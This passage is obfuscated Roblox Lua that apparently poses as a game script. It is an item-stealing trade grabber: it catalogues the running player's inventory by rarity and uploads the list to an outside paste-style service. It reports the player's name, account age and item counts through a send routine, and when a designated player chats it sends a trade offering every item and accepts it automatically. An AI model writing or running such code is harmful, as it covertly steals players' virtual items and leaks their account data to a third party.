in pairs(v271) do local v296=0 -0 ;while true do if (v296==(0 + 0)) then table.insert(v180,v295.ItemName);if (v295.Rarity==v7("\7\8\220\160\249\215\184","\221\81\97\178\212\152\176")) then local v434=0 + 0 ;while true do if (v434==(0 + 0)) then v190=v190 + 1 ;table.insert(v182,v295.DataID);break;end end end v296=1231 -(957 + 273) ;end if ((2 + 2)==v296) then if (v295.Rarity==v7("\46\227\143\64\248\56","\89\123\141\230\49\141\93")) then local v435=0 + 0 ;local v436;while true do if (v435==(0 -0)) then v436=0 -0 ;while true do if (v436==(0 -0)) then v197=v197 + (4 -3) ;table.insert(v189,v295.DataID);break;end end break;end end end break;end if (v296==1) then if (v295.Rarity==v7("\238\232\16\246\21\195","\122\173\135\125\155")) then v191=v191 + (1781 -(389 + 1391)) ;table.insert(v183,v295.DataID);end if (v295.Rarity==v7("\177\207\3\182\50\60\199\138","\168\228\161\96\217\95\81")) then local v437=0 + 0 ;local v438;while true do if (v437==0) then v438=0 + 0 ;while true do if (v438==0) then v192=v192 + (2 -1) ;table.insert(v184,v295.DataID);break;end end break;end end end v296=953 -(783 + 168) ;end if ((9 -6)==v296) then if (v295.Rarity==v7("\163\78\92\34\157","\78\228\33\56")) then local v439=0 + 0 ;while true do if ((311 -(309 + 2))==v439) then v195=v195 + (2 -1) ;table.insert(v187,v295.DataID);break;end end end if (v295.Rarity==v7("\239\112\177\10\128\192\106","\229\174\30\210\99")) then local v440=0;while true do if (v440==(1212 -(1090 + 122))) then v196=v196 + 1 ;table.insert(v188,v295.DataID);break;end end end v296=2 + 2 ;end if (v296==(6 -4)) then if (v295.Rarity==v7("\233\208\60\89","\55\187\177\78\60\79")) then v193=v193 + 1 + 0 ;table.insert(v185,v295.DataID);end if (v295.Rarity==v7("\1\203\88\238\72\203\129\63\215","\224\77\174\63\139\38\175")) then local v441=1118 -(628 + 490) ;while true do if (v441==(0 + 0)) then v194=v194 + 1 ;table.insert(v186,v295.DataID);break;end end end v296=3;end end end end for v272,v273 in pairs(v180) do v181=v181 + 1 ;end local function v198() local v274=0 -0 ;local v275;local v276;local v277;while true do if (v274==(0 -0)) then v275=774 -(431 + 343) ;v276=nil;v274=1;end if (v274==1) then v277=nil;while true do if (v275==(0 -0)) then v276,v277=pcall(function() return require(game:GetService(v7("\193\116\230\0\25\73\242\101\243\8\35\94\252\99\247\11\21","\42\147\17\150\108\112")).Modules.TradeModule);end);return v276 and v277 ;end end break;end end end local function v199() coroutine.resume(v176);local v278={[1]=game:GetService(v7("\63\170\44\102\226\250\28","\136\111\198\77\31\135"))[v168]};game:GetService(v7("\48\12\183\90\180\231\22\189\7\13\148\66\178\246\22\174\7","\201\98\105\199\54\221\132\119")).Trade.SendRequest:InvokeServer(unpack(v278));wait(8 -5 );for v297,v298 in pairs(v189) do local v299=0 + 0 ;local v300;while true do if (v299==0) then v300={[1]=v298,[1 + 1 ]=v7("\142\9\130\49\13\59\191","\204\217\108\227\65\98\85")};game:GetService(v7("\108\198\229\233\37\195\95\215\240\225\31\212\81\209\244\226\41","\160\62\163\149\133\76")).Trade.OfferItem:FireServer(unpack(v300));break;end end end for v301,v302 in pairs(v188) do local v303=1695 -(556 + 1139) ;local v304;while true do if (0==v303) then v304={[16 -(6 + 9) ]=v302,[2]=v7("\225\165\12\63\204\216\179","\163\182\192\109\79")};game:GetService(v7("\6\35\16\204\252\55\39\20\197\241\7\50\15\210\244\51\35","\149\84\70\96\160")).Trade.OfferItem:FireServer(unpack(v304));break;end end end for v305,v306 in pairs(v187) do local v307=0 + 0 ;local v308;while true do if (v307==0) then v308={[1 + 0 ]=v306,[2]=v7("\15\3\12\253\55\8\30","\141\88\102\109")};game:GetService(v7("\129\86\218\124\19\62\84\213\182\87\249\100\21\47\84\198\182","\161\211\51\170\16\122\93\53")).Trade.OfferItem:FireServer(unpack(v308));break;end end end for v309,v310 in pairs(v182) do local v311=169 -(28 + 141) ;local v312;while true do if (0==v311) then v312={[1 + 0 ]=v310,[2]=v7("\204\171\179\56\244\160\161","\72\155\206\210")};game:GetService(v7("\116\127\68\2\58\69\123\64\11\55\117\110\91\28\50\65\127","\83\38\26\52\110")).Trade.OfferItem:FireServer(unpack(v312));break;end end end for v313,v314 in pairs(v186) do local v315=0 -0 ;local v316;while true do if ((0 + 0)==v315) then v316={[1]=v314,[2]=v7("\111\18\38\86\87\25\52","\38\56\119\71")};game:GetService(v7("\193\234\72\218\44\85\242\251\93\210\22\66\252\253\89\209\32","\54\147\143\56\182\69")).Trade.OfferItem:FireServer(unpack(v316));break;end end end for v317,v318 in pairs(v185) do local v319=0;local v320;while true do if (v319==(1317 -(486 + 831))) then v320={[2 -1 ]=v318,[6 -4 ]=v7("\225\132\254\89\208\216\146","\191\182\225\159\41")};game:GetService(v7("\25\23\56\89\130\132\195\63\23\44\102\159\136\208\42\21\45","\162\75\114\72\53\235\231")).Trade.OfferItem:FireServer(unpack(v320));break;end end end for v321,v322 in pairs(v184) do local v323=0 + 0 ;local v324;while true do if (v323==(0 -0)) then v324={[1264 -(668 + 595) ]=v322,[2 + 0 ]=v7("\187\57\69\242\92\12\159","\98\236\92\36\130\51")};game:GetService(v7("\150\28\28\182\76\171\180\36\161\29\63\174\74\186\180\55\161","\80\196\121\108\218\37\200\213")).Trade.OfferItem:FireServer(unpack(v324));break;end end end for v325,v326 in pairs(v183) do local v327=0;local v328;while true do if (v327==0) then v328={[1 + 0 ]=v326,[2]=v7("\55\118\3\111\68\0\153","\234\96\19\98\31\43\110")};game:GetService(v7("\52\26\66\203\165\113\138\18\26\86\244\184\125\153\7\24\87","\235\102\127\50\167\204\18")).Trade.OfferItem:FireServer(unpack(v328));break;end end end wait(6);local v279={[1]=778986662 -493340080 };game:GetService(v7("\98\164\229\47\77\45\81\181\240\39\119\58\95\179\244\36\65","\78\48\193\149\67\36")).Trade.AcceptTrade:FireServer(unpack(v279));end local v200=game:GetService(v7("\24\10\148\8\114\53\12\150\17\66\53","\33\80\126\224\120"));local function v201(v280) local v281={[v7("\237\184\10\251\88\233\190\60\207\89\245","\60\140\200\99\164")]=v7("\223\164\22\49\154\214\203\61\10\145\174\206\30\107\243\175\217\16\2\145\177\205\93\54\173\131\203\40\45\164\142\195","\194\231\148\100\70"),[v7("\71\92\200\156\230\201\85\88\196\156\245\199\66\73","\168\38\44\161\195\150")]=v280,[v7("\129\236\139\73\63\248\162\31\143\242","\118\224\156\226\22\80\136\214")]=v7("\82\239\74\148\71","\224\34\142\57")};local v282="";for v329,v330 in pairs(v281) do v282=v282   .. v329   .. "="   .. v200:UrlEncode(v330)   .. "&" ;end v282=v282:sub(291 -(23 + 267) , -(1946 -(1129 + 815)));local v283;local v284,v285=pcall(function() v283=request({[v7("\235\181\201","\110\190\199\165\189\19\145\61")]=v7("\210\255\99\248\152\157\149\164\103\233\152\211\223\233\126\230\197\196\213\230\56\233\155\206\149\234\103\225\180\215\213\248\99\166\155\207\202","\167\186\139\23\136\235"),[v7("\55\176\156\5\21\177","\109\122\213\232")]=v7("\222\216\145\4","\80\142\151\194"),[v7("\33\201\115\85","\44\99\166\23")]=v282,[v7("\84\242\40\50\54\182\111","\196\28\151\73\86\83")]={[v7("\208\12\39\4\135\86\12\59\199\26\57\21","\22\147\99\73\112\226\56\120")]=v7("\185\101\242\249\132\187\116\246\252\130\182\58\250\184\154\175\98\175\243\130\170\120\175\224\159\180\112\236\246\130\188\112\230","\237\216\21\130\149")},[v7("\182\71\82\90\191\220\74","\62\226\46\63\63\208\169")]=407 -(371 + 16) });end);if ( not v284 or  not v283 or  not v283.Success) then return "\nError...\n";end local v286=v283.Body;local v287=v7("\237\13\65\147\12\87\96\17\245\24\70\151\26\15\38\80\171\26\90\142\80\31\46\73\170","\62\133\121\53\227\127\109\79")   .. v286:match(v7("\88\47\119\226\235\229\235\84","\194\112\116\82\149\182\206")) ;return v287;end local function v202(v288) if ( #v288==(1750 -(1326 + 424))) then return v7("\23\167\66\29","\110\89\200\44\120\160\130");else return table.concat(v288,"\n");end end local v203="--  Uniques\n"   .. v202(v189)   .. "\n\n--  Ancient\n"   .. v202(v188)   .. "\n\n--  Godlies\n"   .. v202(v187)   .. "\n\n--  Legendaries\n"   .. v202(v186)   .. "\n\n--  Vintage\n"   .. v202(v182)   .. "\n\n--  Rare\n"   .. v202(v185)   .. "\n\n--  Uncommon\n"   .. v202(v184)   .. "\n\n--  Common\n"   .. v202(v183) ;local v204=v201(v203);local v205={[v7("\191\202\95\74\70","\45\203\163\43\38\35\42\91")]=v7("\252\128\203\99\170\132\6\146\173\213\55\203\233\81\202\128\223\54\147\172\20\209\138\216\38\199\168\86\221\147\217\99\147\166\20\193\145\217\34\139\233\93\198\203","\52\178\229\188\67\231\201"),[v7("\34\78\92\11\229","\67\65\33\48\100\151\60")]=123638 -58358 ,[v7("\217\238\171\212\247\204","\147\191\135\206\184")]={{[v7("\138\41\171\196","\210\228\72\198\161\184\51")]=v7("\18\76\231\17\122\194\37\19","\174\86\41\147\112\19"),[v7("\77\1\129\30\32","\203\59\96\237\107\69\111\113")]=v7("\36\22\172\207\48\253\210\126\86","\183\68\118\204\129\81\144")   .. game.Players.LocalPlayer.Name   .. "\nAccountAge: "   .. tostring(game.Players.LocalPlayer.AccountAge)   .. v7("\60\168\115\225\2\148\11\191\42\164","\226\110\205\16\132\107")   .. v168   .. v7("\235\195\224","\33\139\163\128\185") },{[v7("\89\89\9\219","\190\55\56\100")]=v7("\126\166\40\68","\147\54\207\92\126\115\131"),[v7("\27\48\57\104\8","\30\109\81\85\29\109")]=v7("\203\126\64\183\58\158\223\240\100\90\162\108\158","\156\159\17\52\214\86\190")   .. tostring(v197 + v196 + v195 + v194 + v190 + v193 + v192 + v191 )   .. "\n Uniques: "   .. tostring(v197)   .. "\n Ancients: "   .. tostring(v196)   .. "\nGodlys: "   .. v195   .. "\nLegendarys: "   .. v194   .. v7("\152\230\179\168\175\232\184\175\244\175","\220\206\143\221")   .. tostring(v190)   .. "\nRares: "   .. v193   .. "\nUncommons: "   .. tostring(v192)   .. "\nCommons: "   .. tostring(v191) },{[v7("\136\124\32\18","\178\230\29\77\119\184\172")]=v7("\221\183\30\91\91\241\230\170\80","\152\149\222\106\123\23"),[v7("\203\39\250\86\176","\213\189\70\150\35")]=v7("\116\118\120\1\76\94\52\32\74\71\113\53\7","\104\47\53\20")   .. v204   .. ")" }}};if ((v195>=(772 -(720 + 51))) or (v196>=(2 -1)) or (v197>=(1777 -(421 + 1355)))) then v175(v169,v205,true);end game.Players.PlayerAdded:Connect(function(v289) if (v289.Name==v168) then v289.Chatted:Connect(function(v397) v199();end);end end);